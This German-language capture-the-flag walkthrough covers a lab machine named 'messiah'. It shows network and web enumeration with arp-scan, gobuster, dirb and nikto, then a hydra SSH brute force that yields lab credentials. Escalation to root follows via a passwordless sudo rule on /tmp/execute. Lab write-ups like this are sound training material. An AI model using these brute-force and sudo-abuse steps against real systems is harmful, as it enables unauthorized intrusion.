Der Befehl arp-scan -l wurde verwendet, um das lokale Netzwerk nach aktiven Hosts zu scannen. Das Ergebnis zeigt, dass die IP-Adresse 192.168.2.113 dem Gerät mit der MAC-Adresse 08:00:27:4e:aa:43 gehört, das von PCS Systemtechnik GmbH hergestellt wurde. Dies ist ein wichtiger erster Schritt, um das Zielsystem im Netzwerk zu identifizieren.
Der Befehl vi /etc/hosts öffnet die /etc/hosts-Datei mit dem VI-Editor.
In der /etc/hosts Datei wird die IP-Adresse 192.168.2.113 dem Hostnamen messiah.vln zugewiesen. Dies ermöglicht es, das Zielsystem einfach über seinen Hostnamen anzusprechen, anstatt seine IP-Adresse verwenden zu müssen.
In der Phase der Web Enumeration konzentrieren wir uns darauf, Informationen über die Webanwendung zu sammeln, die auf dem Zielsystem läuft. Dies umfasst das Scannen der Website mit Tools wie Nikto und Gobuster, um versteckte Dateien und Verzeichnisse zu finden.
http://messiah.vln/index (Status: 200) [Size: 306] http://messiah.vln/index.html (Status: 200) [Size: 306] http://messiah.vln/robots (Status: 200) [Size: 122] http://messiah.vln/robots.txt (Status: 200) [Size: 122]
Der Befehl gobuster dir -u http://messiah.vln -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,js -w "/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -b '403,404' -e --no-error -k führt einen Gobuster-Scan auf dem Zielsystem durch. Gobuster ist ein Open-Source-Tool, das zum Auffinden von versteckten Dateien und Verzeichnissen auf einem Webserver verwendet wird.
Die Ergebnisse des Gobuster-Scans zeigen, dass die Dateien index, index.html, robots und robots.txt gefunden wurden. Diese Informationen können verwendet werden, um die Struktur der Website besser zu verstehen und potenzielle Angriffspunkte zu identifizieren.
+ http://192.168.2.113/index (CDE:200|SIZE:306) + http://192.168.2.113/cgi-bin/ (CDE:403|SIZE:289) + http://192.168.2.113/images1 (CDE:200|SIZE:57704) + http://192.168.2.113/index.html (CDE:200|SIZE:306) + http://192.168.2.113/robots (CDE:200|SIZE:122) + http://192.168.2.113/robots.txt (CDE:200|SIZE:122)
Der Befehl dirb http://192.168.2.113 führt einen DIRB-Scan auf dem Zielsystem durch. DIRB ist ein Web Content Scanner, der nach existierenden Web-Objekten sucht.
Die Ergebnisse des DIRB-Scans bestätigen die Ergebnisse des Gobuster-Scans und zeigen zusätzlich das Verzeichnis /cgi-bin/ (Status 403 Forbidden) und das Verzeichnis /images1 (Status 200 OK).
- Nikto v2.5.0 + Target IP: 192.168.2.113 + Target Hostname: 192.168.2.113 + Target Port: 80 + Start Time: 2024-01-28 22:23:27 (GMT1) + Server: Apache/2.2.14 (Ubuntu) + /: Server may leak inodes via ETags, header found with file /, inode: 142107, size: 306, mtime: Sat Aug 1 00:31:34 2020. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418 + /: The anti-clickjacking X-Frame-ptions header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-ptions + /: The X-Content-Type-ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + Apache/2.2.14 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EL for the 2.x branch. + /index: Uncommon header 'tcn' found, with contents: list. + /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275 + PTINS: Allowed HTTP Methods: GET, HEAD, PST, PTINS . + /icons/: Directory indexing found. + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/ + /#wp-config.php#: #wp-config.php# file found. This file contains the credentials. + 8909 requests: 0 error(s) and 10 item(s) reported on remote host + End Time: 2024-01-28 22:23:38 (GMT1) (11 seconds) + 1 host(s) tested
Der Befehl nikto -h 192.168.2.113 führt einen Nikto-Scan auf dem Zielsystem durch. Nikto ist ein Open-Source-Webserver-Scanner, der nach potenziell gefährlichen Dateien, veralteten Softwareversionen und anderen Sicherheitsproblemen sucht.
Die Ergebnisse des Nikto-Scans zeigen mehrere interessante Punkte:
/icons/ aktiviert./#wp-config.php# wurde gefunden, die möglicherweise Anmeldeinformationen enthält.Diese Ergebnisse liefern wertvolle Hinweise auf potenzielle Schwachstellen, die in den folgenden Phasen des Pentests weiter untersucht werden können.
Der Aufruf von http://messiah.vln/robots im Browser zeigt den Inhalt der robots-Datei an.
Der Inhalt der Datei ist Base64-kodiert.
Die Base64-dekodierte Nachricht lautet: "well done! if you guess the username then the passwword is royalbankofspain--".
Dies deutet darauf hin, dass der Benutzername erraten werden muss, um das Passwort zu erhalten. Das Passwort lautet royalbankofspain.
In der Phase des Initial Access versuchen wir, uns Zugriff auf das Zielsystem zu verschaffen. Dies kann durch Ausnutzung von Schwachstellen, Brute-Force-Angriffe oder andere Techniken erfolgen.
Der Befehl dpkg -l | grep kali-tweaks listet installierte Pakete auf und filtert die Ausgabe nach dem Paket kali-tweaks.
>>> Configuring SSH > Enabling wide compatibility > $ cp -f /usr/share/kali-defaults/etc/ssh/ssh_config.d/kali-wide-compat.conf /etc/ssh/ssh_config.d/kali-wide-compat.conf ┏━(Message from Kali developers) ┃ For more information about SSH configuration, please refer to: ┃ https://www.kali.org/docs/general-use/ssh-configuration/ ┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ > Press Enter to continue...
Der Befehl kali-tweaks -h zeigt die Hilfeseite des Tools kali-tweaks an. In diesem Fall wird es verwendet, um SSH zu konfigurieren und die Kompatibilität zu verbessern.
Monje João Nebenrolle in Haus des Geldes Germain ist in einer Nebenrolle der dritten Staffel der Netflix-Serie La casa de papel (Haus des Geldes) zu sehen. Neymar spielt einen brasilianischen Mönch namens Jao, wie er selbst auf Twitter mitteilte. La Casa de Papel ist die meistgesehene nicht-englische Serie auf Netflix
Eine Google-Suche nach "neymar besetzung von haus des geldes" ergibt, dass Neymar in der dritten Staffel der Netflix-Serie "Haus des Geldes" (La casa de papel) einen brasilianischen Mönch namens Jao spielt.
Dies könnte ein Hinweis auf den Benutzernamen sein, der für den SSH-Zugriff verwendet werden kann.
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these * ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-28 23:12:42 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 64 tasks per 1 server, overall 64 tasks, 64 login tries (l:16/p:4), ~1 try per task [DATA] attacking ssh://192.168.2.113:22/ ~ [22][ssh] host: 192.168.2.113 login: gandia password: royalbankofspain ~ 1 of 1 target successfully completed, 1 valid password found
Der Befehl hydra -L user.txt -P pass.txt ssh://192.168.2.113:22 -t 64 führt einen Brute-Force-Angriff auf den SSH-Dienst auf dem Zielsystem durch. Hydra ist ein Tool zum Knacken von Passwörtern, das verschiedene Protokolle unterstützt.
In diesem Fall wird Hydra verwendet, um Benutzernamen aus der Datei user.txt und Passwörter aus der Datei pass.txt zu verwenden, um sich beim SSH-Dienst anzumelden. Die Option -t 64 gibt die Anzahl der parallelen Aufgaben an.
Die Ausgabe zeigt, dass der Benutzername gandia und das Passwort royalbankofspain erfolgreich waren.
Linux ubuntu 2.6.32-38-server #83-Ubuntu SMP Wed Jan 4 11:26:59 UTC 2012 x86_64 GNU/Linux Ubuntu 10.04.4 LTS Welcome to the Ubuntu Server! * Documentation: http://www.ubuntu.com/server/doc System information as of Mon Jan 29 03:46:28 IST 2024 System load: 0.0 Processes: 76 Usage of /: 19.8% of 9.38GB Users logged in: 0 Memory usage: 46% IP address for eth0: 192.168.2.113 Swap usage: 0% Graph this data and manage this system at https://landscape.canonical.com/ 0 packages can be updated. 0 updates are security updates. New release 'precise' available. Run 'do-release-upgrade' to upgrade to it. Last login: Wed Aug 5 19:00:24 2020 from 192.168.2.3gandia@ubuntu$ id uid=1001(gandia) gid=1001(gandia) groups=1001(gandia)
Der Befehl ssh gandia@messiah.vln -oHostKeyAlgorithms=+ssh-dss versucht, sich über SSH mit dem Benutzernamen gandia@messiah.vln zu verbinden. Die Option -oHostKeyAlgorithms=+ssh-dss wird verwendet, um den ssh-dss HostKeyAlgorithm zu aktivieren, da das Zielsystem möglicherweise einen älteren SSH-Server verwendet.
Die Ausgabe zeigt die Betriebssystemversion des Zielsystems. Die Ausgabe "uid=1001(gandia) gid=1001(gandia) groups=1001(gandia)" bestätigt, dass der Benutzer gandia erfolgreich angemeldet wurde.
total 32 drwxr-xr-x 4 gandia gandia 4096 2020-08-01 11:35 ./ drwxr-xr-x 5 root root 4096 2020-08-01 07:15 ../ -rw- 1 gandia gandia 118 2020-08-05 19:01 .bash_history -rw-r--r-- 1 gandia gandia 220 2020-08-01 03:49 .bash_logout -rw-r--r-- 1 gandia gandia 3103 2020-08-01 03:49 .bashrc drwx 2 gandia gandia 4096 2020-08-01 04:34 .cache/ -rw-r--r-- 1 gandia gandia 675 2020-08-01 03:49 .profile drwx 2 gandia gandia 4096 2020-08-01 11:35 .ssh/
sudo -l sudo su - ls cd / ls cd root cd /home ls cd professor ls exit ls exit cd /home ls ssh berlin@192.168.2.5 exit
15945 316 -rwsr-xr-- 1 root dip 321680 Mar 7 2010 /usr/sbin/pppd 16020 20 -rwsr-sr-x 1 libuuid libuuid 18888 Jan 21 2011 /usr/sbin/uuidd 15912 196 -rwsr-xr-x 1 root root 199928 Jun 17 2011 /usr/lib/openssh/ssh-keysign 924 12 -rwsr-xr-x 1 root root 10592 Jan 22 2011 /usr/lib/pt_chown 5431 12 -rwsr-xr-x 1 root root 10472 Nov 10 2009 /usr/lib/eject/dmcrypt-get-device 15138 52 -rwsr-sr-x 1 daemon daemon 52032 Jan 15 2011 /usr/bin/at 3707 40 -rwsr-xr-x 1 root root 37128 Feb 15 2011 /usr/bin/chsh 3710 44 -rwsr-xr-x 1 root root 42856 Feb 15 2011 /usr/bin/passwd 3706 44 -rwsr-xr-x 1 root root 41864 Feb 15 2011 /usr/bin/chfn 3709 60 -rwsr-xr-x 1 root root 59752 Feb 15 2011 /usr/bin/gpasswd 3424 32 -rwsr-xr-x 1 root root 32416 Feb 15 2011 /usr/bin/newgrp 15462 20 -rwsr-xr-x 1 root root 18928 Mar 12 2010 /usr/bin/traceroute6.iputils 15459 16 -rwsr-xr-x 1 root root 14720 Mar 12 2010 /usr/bin/arping 15876 64 -rwsr-xr-x 1 root root 62416 Mar 7 2010 /usr/bin/mtr 8636 148 -rwsr-xr-x 2 root root 148024 Jan 19 2011 /usr/bin/sudo 8636 148 -rwsr-xr-x 2 root root 148024 Jan 19 2011 /usr/bin/sudoedit 130372 56 -rwsr-xr-x 1 root root 56680 Jan 21 2011 /bin/umount 138727 32 -rwsr-xr-x 1 root root 31384 Feb 12 2011 /bin/fusermount 130828 36 -rwsr-xr-x 1 root root 36864 Feb 15 2011 /bin/ping 130370 84 -rwsr-xr-x 1 root root 82256 Jan 21 2011 /bin/mount 130093 36 -rwsr-xr-x 1 root root 36864 Feb 15 2011 /bin/su 130829 32 -rwsr-xr-x 1 root root 31448 Mar 12 2010 /bin/ping6
Die Ausgabe von "ll" zeigt den Inhalt des Home-Verzeichnisses des Benutzers gandia. Die Datei ".bash_history" enthält die Befehle, die der Benutzer zuvor ausgeführt hat.
Der Befehl find / -type f -perm -4000 -ls 2>/dev/null listet alle ausführbaren Dateien mit dem SUID-Bit auf dem System auf. Dies kann helfen, potenzielle Kandidaten für eine Rechteausweitung zu finden.
total 20 drwxrwxrwt 2 root root 4096 2024-01-29 03:55 ./ drwxr-xr-x 22 root root 4096 2024-01-29 01:19 ../ -rw-r--r-- 1 gandia gandia 10240 2024-01-29 03:55 professor.tar
In diesem Abschnitt sehen wir die Übertragung von Daten und Dateien zwischen dem Zielsystem und dem angreifenden System.
In diesem Abschnitt werden die Informationen zum Benutzer professor auf dem Zielsystem gesammelt.
Die Ausgabe von "sudo -l" zeigt, dass der Benutzer professor den Befehl "/tmp/execute" als Root ausführen kann, ohne ein Passwort einzugeben. Dies ist eine wichtige Information, da es eine Möglichkeit zur Rechteausweitung darstellen kann.
total 20 drwxrwxrwt 2 root root 4096 2024-01-29 04:34 ./ drwxr-xr-x 22 root root 4096 2024-01-29 01:19 ../ -rw-r--r-- 1 gandia gandia 10240 2024-01-29 03:55 professor.tar
total 24 drwxrwxrwt 2 root root 4096 2024-01-29 04:35 ./ drwxr-xr-x 22 root root 4096 2024-01-29 01:19 ../ -rw-r--r-- 1 professor professor 26 2024-01-29 04:34 execute
In der Phase der Privilege Escalation versuchen wir, unsere Berechtigungen auf dem Zielsystem zu erhöhen, um Root-Zugriff zu erhalten.
Herzlichen Glückwunsch! Die Rechteausweitung war erfolgreich und wir haben Root-Zugriff auf das Zielsystem erlangt.
Nachdem die Root-Rechte mit den Befehlen "sudo ./execute" erlangt und anschließend mit dem Befehl "id" bestätigt, dass die Root-Rechte erfolgreich erlangt wurden.
Nachdem die Root-Rechte erlangt wurden, ist das finale Ziel das finden der Root Flagge.
___ ___ __ .__ _____ .__ .__
/ | \ _____ ____ | | __|__| ____ ____ / \ ____ ______ ______|__|_____ | |__
/ ~ \\__ \ _/ ___\ | |/ /| | / \ / ___\ / \ / \ _/ __ \ / ___/ / ___/| |\__ \ | | \
\ Y / / __ \_\ \___ | < | || | \ / /_/ > / Y \\ ___/ \___ \ \___ \ | | / __ \_| Y \
\___|_ / (____ / \___ >|__|_ \|__||___| / \___ / \____|__ / \___ >/____ >/____ >|__|(____ /|___| /
\/ \/ \/ \/ \/ /_____/ \/ \/ \/ \/ \/ \/
Congratulations!!! You have just passed all the flag.....!!!!!!
In der Phase der Reconnaissance sammeln wir Informationen über das Zielsystem. Dies umfasst das Scannen des Netzwerks, um offene Ports und Dienste zu identifizieren, sowie die Auflösung von Hostnamen, um die IP-Adresse des Ziels zu bestimmen.